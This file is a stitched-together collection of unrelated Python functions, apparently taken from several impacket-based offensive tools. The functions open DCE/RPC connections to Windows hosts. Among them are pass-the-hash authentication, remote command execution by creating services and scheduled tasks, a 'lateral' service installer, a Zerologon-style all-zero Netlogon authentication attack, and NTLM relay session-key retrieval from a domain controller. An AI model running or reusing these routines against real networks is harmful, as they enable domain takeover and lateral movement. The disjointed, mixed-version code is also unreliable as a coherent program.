def play(self, addr):
stringbinding = r'ncacn_np:%s[\pipe\atsvc]' % addr
rpctransport = transport.DCERPCTransportFactory(stringbinding)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
self.__aesKey)
rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)
try:
self.doStuff(rpctransport)
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
logging.error(e)
if str(e).find('STATUS_OBJECT_NAME_NOT_FOUND') >=0:
logging.info('When STATUS_OBJECT_NAME_NOT_FOUND is received, try running again. It might work')
def run(self, addr):
for protocol in self.__protocols:
protodef = PSEXEC.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
logging.info("Trying protocol %s...\n" % protocol)
stringbinding = protodef[0] % addr
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
#if hasattr(rpctransport,'preferred_dialect'):
# rpctransport.preferred_dialect(SMB_DIALECT)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)
rpctransport.set_kerberos(self.__doKerberos)
self.doStuff(rpctransport)
def connect(self):
rpctransport = transport.DCERPCTransportFactory(self.stringBinding)
if len(self.hashes) > 0:
lmhash, nthash = self.hashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.username, self.password,
self.domain, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
#dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY)
dce.connect()
dce.bind(rprn.MSRPC_UUID_RPRN, transfer_syntax=self.ts)
#resp = rrp.hOpenLocalMachine(dce, MAXIMUM_ALLOWED | rrp.KEY_WOW64_32KEY | rrp.KEY_ENUMERATE_SUB_KEYS)
return dce, rpctransport #, resp['phKey']
def msrpc():
MSRPC_UUID_test = uuidtup_to_bin(
('00001111-2222-3333-4444-555566667777', '1.0'))
USERNAME = '******'
PASSWORD = '******'
DOMAIN = "."
target = argv[1]
stringbinding = r'ncacn_np:%s[\pipe\lateral]' % target
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(445)
rpctransport.setRemoteHost(target)
rpctransport.set_credentials(USERNAME, PASSWORD, DOMAIN, "", "", None)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(MSRPC_UUID_test)
return dce
def connect2(self):
rpctransport = transport.DCERPCTransportFactory(self.stringBinding)
if len(self.hashes) > 0:
lmhash, nthash = self.hashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.username, self.password,
self.domain, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY)
#dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
dce.connect()
dce.bind(drsuapi.MSRPC_UUID_DRSUAPI, transfer_syntax=self.ts)
return dce, rpctransport
def connect_and_bind(self):
try:
rpctransport = transport.DCERPCTransportFactory(self.do_binding())
if hasattr(rpctransport, 'set_credentials'):
rpctransport.set_credentials(self.username, self.password,
self.domain, '', '')
dce = rpctransport.get_dce_rpc()
dce.connect()
self.rpcTransport = rpctransport
if self.auth_level:
dce.set_auth_level(self.auth_level)
dce.bind(self.iface_uuid, transfer_syntax=self.ts)
self.dce = dce
except Exception as err:
logger.debug(
f'{type(self).__name__} - Connection failed for {self.destination}->{self.target}:{self.trgt_port} - {err}'
)
def connect(self):
rpctransport = transport.DCERPCTransportFactory(self.stringBinding)
if len(self.machineUserHashes) > 0:
lmhash, nthash = self.machineUserHashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.machineUser, '', self.domain, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
# dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY)
dce.connect()
dce.bind(nrpc.MSRPC_UUID_NRPC)
resp = nrpc.hNetrServerReqChallenge(dce, NULL, self.serverName + '\x00', b'12345678')
resp.dump()
serverChallenge = resp['ServerChallenge']
if self.machineUserHashes == '':
ntHash = None
else:
ntHash = unhexlify(self.machineUserHashes.split(':')[1])
self.sessionKey = nrpc.ComputeSessionKeyStrongKey('', b'12345678', serverChallenge, ntHash)
ppp = nrpc.ComputeNetlogonCredential(b'12345678', self.sessionKey)
try:
resp = nrpc.hNetrServerAuthenticate3(dce, NULL, self.machineUser + '\x00',
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel,
self.serverName + '\x00', ppp, 0x600FFFFF)
resp.dump()
except Exception as e:
if str(e).find('STATUS_DOWNGRADE_DETECTED') < 0:
raise
self.clientStoredCredential = pack('<Q', unpack('<Q', ppp)[0] + 10)
# dce.set_auth_type(RPC_C_AUTHN_NETLOGON)
# dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY)
# dce2 = dce.alter_ctx(nrpc.MSRPC_UUID_NRPC)
# dce2.set_session_key(self.sessionKey)
return dce, rpctransport
def dump(self, remoteName, remoteHost):
stringbinding = epm.hept_map(remoteHost,
nrpc.MSRPC_UUID_NRPC,
protocol='ncacn_ip_tcp')
logging.info('StringBinding %s' % stringbinding)
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.setRemoteHost(remoteHost)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password,
self.__domain, self.__lmhash,
self.__nthash)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(nrpc.MSRPC_UUID_NRPC)
resp = nrpc.hNetrServerReqChallenge(dce, NULL, remoteName + '\x00',
b'12345678')
# resp.dump()
serverChallenge = resp['ServerChallenge']
ntHash = unhexlify(self.__nthash)
self.sessionKey = nrpc.ComputeSessionKeyStrongKey(
self.__password, b'12345678', serverChallenge, ntHash)
self.ppp = nrpc.ComputeNetlogonCredential(b'12345678', self.sessionKey)
try:
resp = nrpc.hNetrServerAuthenticate3(
dce, NULL, self.__username + '\x00', nrpc.
NETLOGON_SECURE_CHANNEL_TYPE.TrustedDnsDomainSecureChannel,
remoteName + '\x00', self.ppp, 0x600FFFFF)
# resp.dump()
except Exception as e:
if str(e).find('STATUS_DOWNGRADE_DETECTED') < 0:
raise
self.clientStoredCredential = pack('<Q',
unpack('<Q', self.ppp)[0] + 10)
return dce, rpctransport
def getSessionKey(computer, domain, domainIP, hashes, serverName, authMessage) :
print ("Connecting to NETLOGON service : Authenticating Server")
stringBinding = r'ncacn_np:%s[\PIPE\netlogon]' % domainIP
rpctransport = transport.DCERPCTransportFactory(stringBinding)
ntHash = unhexlify(hashes.split(':')[1])
rpctransport.set_credentials(computer,"",domain,"",ntHash)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(nrpc.MSRPC_UUID_NRPC)
resp = nrpc.hNetrServerReqChallenge(dce, NULL, serverName +"\x00",'12345678')
serverChallenge = resp['ServerChallenge']
sessionKey = nrpc.ComputeSessionKeyStrongKey('','12345678',serverChallenge, ntHash)
ppp = nrpc.ComputeNetlogonCredential('12345678',sessionKey)
nrpc.hNetrServerAuthenticate3(dce, NULL, computer+"\x00",nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel, serverName + '\x00', ppp, 0x600FFFFF)
clientStoredCredential = pack('<Q', unpack('<Q',ppp)[0] + 10)
#SamLogonWithFlags
print "Forwarding NTLM Response to DC"
request = nrpc.NetrLogonSamLogonWithFlags()
request['LogonServer'] = '\x00'
request['ComputerName'] = serverName + '\x00'
request['ValidationLevel'] = nrpc.NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4
request['LogonLevel'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['tag'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['LogonNetworkTransitive']['Identity']['LogonDomainName'] = authMessage['domain_name'].decode('utf-16le')
request['LogonInformation']['LogonNetworkTransitive']['Identity']['ParameterControl'] = 0
request['LogonInformation']['LogonNetworkTransitive']['Identity']['UserName'] = authMessage['user_name'].decode('utf-16le')
request['LogonInformation']['LogonNetworkTransitive']['Identity']['Workstation'] = ''
request['LogonInformation']['LogonNetworkTransitive']['LmChallenge'] = 'AAAAAAAA' #challenge
request['LogonInformation']['LogonNetworkTransitive']['NtChallengeResponse'] = authMessage['ntlm']
request['LogonInformation']['LogonNetworkTransitive']['LmChallengeResponse'] = authMessage['lanman']
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = nrpc.ComputeNetlogonCredential(clientStoredCredential, sessionKey)
authenticator['Timestamp'] = 10
request['Authenticator'] = authenticator
request['ReturnAuthenticator']['Credential'] = '\x00'*8
request['ReturnAuthenticator']['Timestamp'] = 0
request['ExtraFlags'] = 0
resp = dce.request(request)
encryptedSessionKey = authMessage['session_key']
sessionKey = generateEncryptedSessionKey(resp['ValidationInformation']['ValidationSam4']['UserSessionKey'], encryptedSessionKey)
print "Retrieving Session Key from DC"
return sessionKey
def connect_smb():
global dce
try:
smb_trans_conn = transport.DCERPCTransportFactory(
'ncacn_np:{}[\\pipe\\browser]'.format(rhost))
smb_trans_conn.connect()
dce = smb_trans_conn.DCERPC_class(smb_trans_conn)
dce.bind(
uuid.uuidtup_to_bin(
('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
except Exception as e:
print(e)
print(" [*] Failed to connect to SMB!")
sys.exit(1)
else:
print(
' [*] Connected to ncacn_np:{}[\\pipe\\browser]'.format(rhost))
def run_samr(self):
if self.__targetIp is not None:
stringBinding = epm.hept_map(self.__targetIp, samr.MSRPC_UUID_SAMR, protocol = 'ncacn_np')
else:
stringBinding = epm.hept_map(self.__target, samr.MSRPC_UUID_SAMR, protocol = 'ncacn_np')
rpctransport = transport.DCERPCTransportFactory(stringBinding)
rpctransport.set_dport(self.__port)
if self.__targetIp is not None:
rpctransport.setRemoteHost(self.__targetIp)
rpctransport.setRemoteName(self.__target)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,
self.__nthash, self.__aesKey)
rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)
self.doSAMRAdd(rpctransport)
def __init__(self,
target,
share_name,
username,
password,
domain,
doKerberos=False,
aesKey=None,
kdcHost=None,
hashes=None):
self.__target = target
self.__username = username
self.__password = password
self.__domain = domain
self.__share_name = share_name
self.__lmhash = ''
self.__nthash = ''
self.__outputBuffer = b''
self.__retOutput = False
self.__aesKey = aesKey
self.__doKerberos = doKerberos
self.__kdcHost = kdcHost
if hashes is not None:
#This checks to see if we didn't provide the LM Hash
if hashes.find(':') != -1:
self.__lmhash, self.__nthash = hashes.split(':')
else:
self.__nthash = hashes
if self.__password is None:
self.__password = ''
stringbinding = r'ncacn_np:%s[\pipe\atsvc]' % self.__target
self.__rpctransport = transport.DCERPCTransportFactory(stringbinding)
if hasattr(self.__rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
self.__rpctransport.set_credentials(self.__username,
self.__password, self.__domain,
self.__lmhash, self.__nthash,
self.__aesKey)
self.__rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)
def check_pipe(target):
username, password, domain, nthash = target.creds
lmhash = "" if password else "aad3b435b51404eeaad3b435b51404ee"
aesKey = None
try:
MSRPC_UUID_lateral = uuidtup_to_bin(
('00001111-2222-3333-4444-555566667777', '1.0'))
stringbinding = r'ncacn_np:%s[\pipe\lateral]' % target.target_ip
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(target.target_port)
rpctransport.setRemoteHost(target.target_ip)
rpctransport.set_credentials(username, password, domain, lmhash,
nthash, aesKey)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(MSRPC_UUID_lateral)
return True
except:
return False
def execute(self, command):
self.__outputBuffer = ''
stringbinding = r'ncacn_np:{}[\pipe\atsvc]'.format(self.host)
self.__rpctransport = transport.DCERPCTransportFactory(stringbinding)
if hasattr(self.__rpctransport, 'set_credentials'):
self.__rpctransport.set_credentials(self.username, self.password,
self.domain, self.lmhash,
self.nthash)
if self.fileless_output:
self.tmpfile = "\\\\{}\\{}{}".format(self.ip, self.share,
self.path + self.outfile)
else:
self.tmpfile = "%windir%\\Temp\\{}".format(self.outfile)
self.doStuff(command)
return self.__outputBuffer
def connect(self):
rpctransport = transport.DCERPCTransportFactory(self.stringBinding)
if len(self.hashes) > 0:
lmhash, nthash = self.hashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.username, self.password,
self.domain, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(lsad.MSRPC_UUID_LSAD, transfer_syntax=self.ts)
resp = lsad.hLsarOpenPolicy2(
dce, MAXIMUM_ALLOWED | lsad.POLICY_CREATE_SECRET | DELETE
| lsad.POLICY_VIEW_LOCAL_INFORMATION)
return dce, rpctransport, resp['PolicyHandle']
def getMachineNameAndDomain(self):
if self.__smbConnection.getServerName() == '':
# No serverName.. this is either because we're doing Kerberos
# or not receiving that data during the login process.
# Let's try getting it through RPC
rpc = transport.DCERPCTransportFactory(
r'ncacn_np:445[\pipe\wkssvc]')
rpc.set_smb_connection(self.__smbConnection)
dce = rpc.get_dce_rpc()
dce.connect()
dce.bind(wkst.MSRPC_UUID_WKST)
resp = wkst.hNetrWkstaGetInfo(dce, 100)
dce.disconnect()
return resp['WkstaInfo']['WkstaInfo100'][
'wki100_computername'][:-1], resp['WkstaInfo']['WkstaInfo100'][
'wki100_langroup'][:-1]
else:
return self.__smbConnection.getServerName(
), self.__smbConnection.getServerDomain()
def run(self, addr):
result = ''
for protocol in self.__protocols:
protodef = CMDEXEC.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
stringbinding = protodef[0] % addr
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
if hasattr(rpctransport, 'preferred_dialect'):
rpctransport.preferred_dialect(SMB_DIALECT)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password,
self.__domain, self.__lmhash,
self.__nthash)
try:
self.shell = RemoteShell(self.__share, rpctransport,
self.__mode, self.__serviceName,
self.__command)
result = self.shell.send_data(self.__command,
self.__disp_output)
except SessionError as e:
if 'STATUS_SHARING_VIOLATION' in str(e):
return
if self.__mode != 'SERVER':
smb_server = SMBServer()
smb_server.daemon = True
smb_server.start()
self.__mode = 'SERVER'
self.shell = RemoteShell(self.__share, rpctransport,
self.__mode, self.__serviceName,
self.__command)
self.shell.set_copyback()
result = self.shell.send_data(self.__command,
self.__disp_output)
smb_server.stop()
return result
def _create_rpc_connection(self, pipe):
# Here we build the DCE/RPC connection
self._pipe = pipe
binding_strings = dict()
binding_strings['srvsvc'] = srvs.MSRPC_UUID_SRVS
binding_strings['wkssvc'] = wkst.MSRPC_UUID_WKST
binding_strings['samr'] = samr.MSRPC_UUID_SAMR
binding_strings['svcctl'] = scmr.MSRPC_UUID_SCMR
binding_strings['drsuapi'] = drsuapi.MSRPC_UUID_DRSUAPI
# TODO: try to fallback to TCP/139 if tcp/445 is closed
if self._pipe == r'\drsuapi':
string_binding = epm.hept_map(self._target_computer,
drsuapi.MSRPC_UUID_DRSUAPI,
protocol='ncacn_ip_tcp')
rpctransport = transport.DCERPCTransportFactory(string_binding)
rpctransport.set_credentials(username=self._user,
password=self._password,
domain=self._domain,
lmhash=self._lmhash,
nthash=self._nthash)
else:
rpctransport = transport.SMBTransport(self._target_computer,
445,
self._pipe,
username=self._user,
password=self._password,
domain=self._domain,
lmhash=self._lmhash,
nthash=self._nthash)
rpctransport.set_connect_timeout(10)
dce = rpctransport.get_dce_rpc()
if self._pipe == r'\drsuapi':
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
dce.connect()
dce.bind(binding_strings[self._pipe[1:]])
self._rpc_connection = dce
def dce_rpc_connect(self, binding, uuid):
logging.debug('DCE/RPC binding: %s' % binding)
try:
self.rpc = transport.DCERPCTransportFactory(binding)
self.rpc.set_connect_timeout(1.0)
if hasattr(self.rpc, 'set_credentials'):
self.rpc.set_credentials(self.ad.auth.username,
self.ad.auth.password,
domain=self.ad.auth.domain,
lmhash=self.ad.auth.lm_hash,
nthash=self.ad.auth.nt_hash,
aesKey=self.ad.auth.aes_key)
# TODO: check Kerberos support
# if hasattr(self.rpc, 'set_kerberos'):
# self.rpc.set_kerberos(True, self.ad.auth.kdc)
# Yes we prefer SMB3, but it isn't supported by all OS
# self.rpc.preferred_dialect(smb3structs.SMB2_DIALECT_30)
# Implement connections reuse?
# rpc.setup_smb_connection()
dce = self.rpc.get_dce_rpc()
# Implement connection timeout?
dce.connect()
# Implement encryption?
# dce.set_auth_level(NTLM_AUTH_PKT_PRIVACY)
dce.bind(uuid)
except DCERPCException as e:
logging.debug(traceback.format_exc())
logging.warning('DCE/RPC connection failed: %s' % str(e))
return None
except KeyboardInterrupt:
raise
except Exception as e:
logging.debug(traceback.format_exc())
logging.warning('DCE/RPC connection failed: %s' % e)
return None
except:
logging.warning('DCE/RPC connection failed (unknown error)')
return None
return dce
def start_service(target):
username, password, domain, nthash = target.creds
lmhash = "" if password else "aad3b435b51404eeaad3b435b51404ee"
aesKey = None
remoteName = target.target_ip
remoteHost = target.target_ip
stringbinding = r'ncacn_np:%s[\pipe\svcctl]' % remoteName
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(target.target_port)
rpctransport.setRemoteHost(remoteHost)
if hasattr(rpctransport, 'set_credentials'):
rpctransport.set_credentials(username, password, domain, lmhash,
nthash, aesKey)
rpctransport.set_kerberos(False, None)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(scmr.MSRPC_UUID_SCMR)
rpc = dce
#print("[*] creating")
ans = scmr.hROpenSCManagerW(rpc)
scManagerHandle = ans['lpScHandle']
try:
scmr.hRCreateServiceW(rpc,
scManagerHandle,
"lateral" + '\x00',
"Lateral" + '\x00',
lpBinaryPathName='lateral.exe\x00')
except Exception as e:
print(str(e))
#print("[*] starting")
ans = scmr.hROpenServiceW(rpc, scManagerHandle, "lateral" + '\x00')
serviceHandle = ans['lpServiceHandle']
try:
scmr.hRStartServiceW(rpc, serviceHandle)
except:
pass
scmr.hRCloseServiceHandle(rpc, serviceHandle)
def exec(self, command):
if not super().exec(command):
return False
try:
stringbinding = r'ncacn_np:%s[\pipe\svcctl]' % self.session.address
logging.debug('StringBinding %s' % stringbinding)
self._rpctransport = transport.DCERPCTransportFactory(stringbinding)
self._rpctransport.set_dport(445)
self._rpctransport.setRemoteHost(self.session.address)
if hasattr(self._rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
self._rpctransport.set_credentials(self.session.username, self.session.password, self.session.domain,
self.session.lmhash, self.session.nthash, self.session.aesKey)
self._rpctransport.set_kerberos(self.session.kerberos, self.session.dc_ip)
self._scmr = self._rpctransport.get_dce_rpc()
try:
self._scmr.connect()
except Exception as e:
raise Exception("An error occurred while connecting to SVCCTL: %s" % e)
s = self._rpctransport.get_smb_connection()
s.setTimeout(100000)
self._scmr.bind(scmr.MSRPC_UUID_SCMR)
resp = scmr.hROpenSCManagerW(self._scmr)
_scHandle = resp['lpScHandle']
resp = scmr.hRCreateServiceW(self._scmr, _scHandle, self._serviceName, self._serviceName, lpBinaryPathName=command,
dwStartType=scmr.SERVICE_DEMAND_START)
logging.debug("Service %s created" % self._serviceName)
self._service = resp['lpServiceHandle']
try:
scmr.hRStartServiceW(self._scmr, self._service)
logging.debug("Service %s restarted for command execution" % self._serviceName)
except:
pass
self.clean()
except KeyboardInterrupt as e:
logging.debug("Keyboard interrupt: Trying to delete %s if it exists" % self._serviceName)
self.clean()
raise KeyboardInterrupt(e)
except Exception as e:
self.clean()
raise Exception(e)
return True
def connect(self, string_binding=None, iface_uuid=None):
"""Obtains a RPC Transport and a DCE interface according to the bindings and
transfer syntax specified.
:return: tuple of DCE/RPC and RPC Transport objects
:rtype: (DCERPC_v5, DCERPCTransport)
"""
string_binding = string_binding or self.string_binding
if not string_binding:
raise NotImplemented("String binding must be defined")
rpc_transport = transport.DCERPCTransportFactory(string_binding)
# Set timeout if defined
if self.timeout:
rpc_transport.set_connect_timeout(self.timeout)
# Authenticate if specified
if self.authn and hasattr(rpc_transport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpc_transport.set_credentials(self.username, self.password,
self.domain, self.lmhash,
self.nthash)
# Gets the DCE RPC object
dce = rpc_transport.get_dce_rpc()
# Set the authentication level
if self.authn_level:
dce.set_auth_level(self.authn_level)
# Connect
dce.connect()
# Bind if specified
iface_uuid = iface_uuid or self.iface_uuid
if iface_uuid and self.transfer_syntax:
dce.bind(iface_uuid, transfer_syntax=self.transfer_syntax)
elif iface_uuid:
dce.bind(iface_uuid)
return dce, rpc_transport
def IOXIDResolver(target_ip):
authLevel = RPC_C_AUTHN_LEVEL_NONE
stringBinding = r'ncacn_ip_tcp:%s' % target_ip
rpctransport = transport.DCERPCTransportFactory(stringBinding)
portmap = rpctransport.get_dce_rpc()
portmap.set_auth_level(authLevel)
portmap.connect()
objExporter = IObjectExporter(portmap)
bindings = objExporter.ServerAlive2()
print("[*] Retrieving network interface of " + target_ip)
#NetworkAddr = bindings[0]['aNetworkAddr']
for binding in bindings:
NetworkAddr = binding['aNetworkAddr']
print("Address: " + NetworkAddr)
print("")
def __set_rpc_connection(self, remote_name, remote_host):
"""
Create an rpc session
:param remote_name:
:param remote_host:
:return:
"""
string_binding = r'ncacn_np:%s[\pipe\samr]' % remote_name
logging.debug('StringBinding %s' % string_binding)
rpc_transport = transport.DCERPCTransportFactory(string_binding)
rpc_transport.set_dport(self.__port)
rpc_transport.setRemoteHost(remote_host)
if hasattr(rpc_transport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpc_transport.set_credentials(self.__username, self.__password,
self.__domain, self.__lmhash,
self.__nthash, self.__aes_key)
rpc_transport.set_kerberos(self.__do_kerberos, self.__kdc_host)
return rpc_transport
def initConnection(self):
rpctransport = transport.DCERPCTransportFactory(self.stringbinding)
if self.serverConfig.rpc_use_smb:
LOG.info(
"Authenticating to smb://%s:%d with creds provided in cmdline"
% (self.target.netloc, self.serverConfig.rpc_smb_port))
rpctransport.set_credentials(self.serverConfig.smbuser, self.serverConfig.smbpass, self.serverConfig.smbdomain, \
self.serverConfig.smblmhash, self.serverConfig.smbnthash)
rpctransport.set_dport(self.serverConfig.rpc_smb_port)
self.session = MYDCERPC_v5(rpctransport)
self.session.set_auth_level(RPC_C_AUTHN_LEVEL_CONNECT)
self.session.connect()
if self.serverConfig.rpc_use_smb:
LOG.info("Authentication to smb://%s:%d succeeded" %
(self.target.netloc, self.serverConfig.rpc_smb_port))
return True
def connect(self, host, service):
if service == 'wkssvc':
stringBinding = r'ncacn_np:{}[\PIPE\wkssvc]'.format(host)
elif service == 'srvsvc':
stringBinding = r'ncacn_np:{}[\PIPE\srvsvc]'.format(host)
rpctransport = transport.DCERPCTransportFactory(stringBinding)
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
dce = rpctransport.get_dce_rpc()
dce.connect()
if service == 'wkssvc':
dce.bind(wkst.MSRPC_UUID_WKST, transfer_syntax = self.__ts)
elif service == 'srvsvc':
dce.bind(srvs.MSRPC_UUID_SRVS, transfer_syntax = self.__ts)
self.__local_ip = rpctransport.get_smb_server().get_socket().getsockname()[0]
return dce, rpctransport
def try_zero_authenticate(
dc_handle,
dc_ip,
target_computer,
channel=nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel):
# Connect to the DC's Netlogon service.
binding = epm.hept_map(dc_ip,
nrpc.MSRPC_UUID_NRPC,
protocol='ncacn_ip_tcp')
rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc()
rpc_con.connect()
rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
# Use an all-zero challenge and credential.
plaintext = b'\x00' * 8
ciphertext = b'\x00' * 8
# Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled.
flags = 0x212fffff
# Send challenge and authentication request.
nrpc.hNetrServerReqChallenge(rpc_con, dc_handle + '\x00',
target_computer + '\x00', plaintext)
try:
server_auth = nrpc.hNetrServerAuthenticate3(
rpc_con, dc_handle + '\x00', target_computer + '$\x00', channel,
target_computer + '\x00', ciphertext, flags)
# It worked!
assert server_auth['ErrorCode'] == 0
return rpc_con
except nrpc.DCERPCSessionError as ex:
# Failure should be due to a STATUS_ACCESS_DENIED error. Otherwise, the attack is probably not working.
if ex.get_error_code() == 0xc0000022:
return None
else:
fail("Unexpected error code from DC: {}.".format(
ex.get_error_code()))
except BaseException as ex:
fail("Unexpected error: {}.".format(ex))
def run(self, addr):
for protocol in self.__protocols:
protodef = CMDEXEC.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
logging.info("Trying protocol %s..." % protocol)
logging.info("Creating service %s..." % self.__serviceName)
stringbinding = protodef[0] % addr
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
if hasattr(rpctransport, 'preferred_dialect'):
rpctransport.preferred_dialect(SMB_DIALECT)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password,
self.__domain, self.__lmhash,
self.__nthash, self.__aesKey)
rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)
self.shell = None
try:
if self.__mode == 'SERVER':
serverThread = SMBServer()
serverThread.daemon = True
serverThread.start()
self.shell = RemoteShell(self.__share, rpctransport,
self.__mode, self.__serviceName)
self.shell.cmdloop()
if self.__mode == 'SERVER':
serverThread.stop()
except (Exception, KeyboardInterrupt), e:
#import traceback
#traceback.print_exc()
logging.critical(str(e))
if self.shell is not None:
self.shell.finish()
sys.stdout.flush()
sys.exit(1)
def connect(self):
if self.rrpStarted is not True:
dce, rpctransport, scHandle = self.connect_scmr()
desiredAccess = scmr.SERVICE_START | scmr.SERVICE_STOP | scmr.SERVICE_CHANGE_CONFIG | \
scmr.SERVICE_QUERY_CONFIG | scmr.SERVICE_QUERY_STATUS | scmr.SERVICE_ENUMERATE_DEPENDENTS
resp = scmr.hROpenServiceW(dce, scHandle, 'RemoteRegistry\x00',
desiredAccess)
resp.dump()
serviceHandle = resp['lpServiceHandle']
try:
resp = scmr.hRStartServiceW(dce, serviceHandle)
except Exception as e:
if str(e).find('ERROR_SERVICE_ALREADY_RUNNING') >= 0:
pass
else:
raise
resp = scmr.hRCloseServiceHandle(dce, scHandle)
self.rrpStarted = True
rpctransport = transport.DCERPCTransportFactory(self.stringBinding)
if len(self.hashes) > 0:
lmhash, nthash = self.hashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.username, self.password,
self.domain, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
#dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY)
dce.connect()
dce.bind(rrp.MSRPC_UUID_RRP, transfer_syntax=self.ts)
resp = rrp.hOpenLocalMachine(
dce,
MAXIMUM_ALLOWED | rrp.KEY_WOW64_32KEY | rrp.KEY_ENUMERATE_SUB_KEYS)
return dce, rpctransport, resp['phKey']
def run(self, addr):
result = ''
for protocol in self.__protocols:
protodef = CMDEXEC.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
#logging.info("Trying protocol %s..." % protocol)
#logging.info("Creating service %s..." % self.__serviceName)
stringbinding = protodef[0] % addr
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
if hasattr(rpctransport,'preferred_dialect'):
rpctransport.preferred_dialect(SMB_DIALECT)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)
try:
self.shell = RemoteShellsmbexec(self.__share, rpctransport, self.__mode, self.__serviceName, self.__command)
result = self.shell.send_data(self.__command)
except SessionError as e:
if 'STATUS_SHARING_VIOLATION' in str(e):
return
else:
print "[-] {}".format(e)
#self.__mode = 'SERVER'
#serverThread = SMBServer()
#serverThread.daemon = True
#serverThread.start()
#self.shell = RemoteShellsmbexec(self.__share, rpctransport, self.__mode, self.__serviceName, self.__command)
#self.shell.set_copyback()
#result = self.shell.send_data(self.__command)
#serverThread.stop()
except (Exception, KeyboardInterrupt), e:
print e
traceback.print_exc()
self.shell.finish()
sys.stdout.flush()
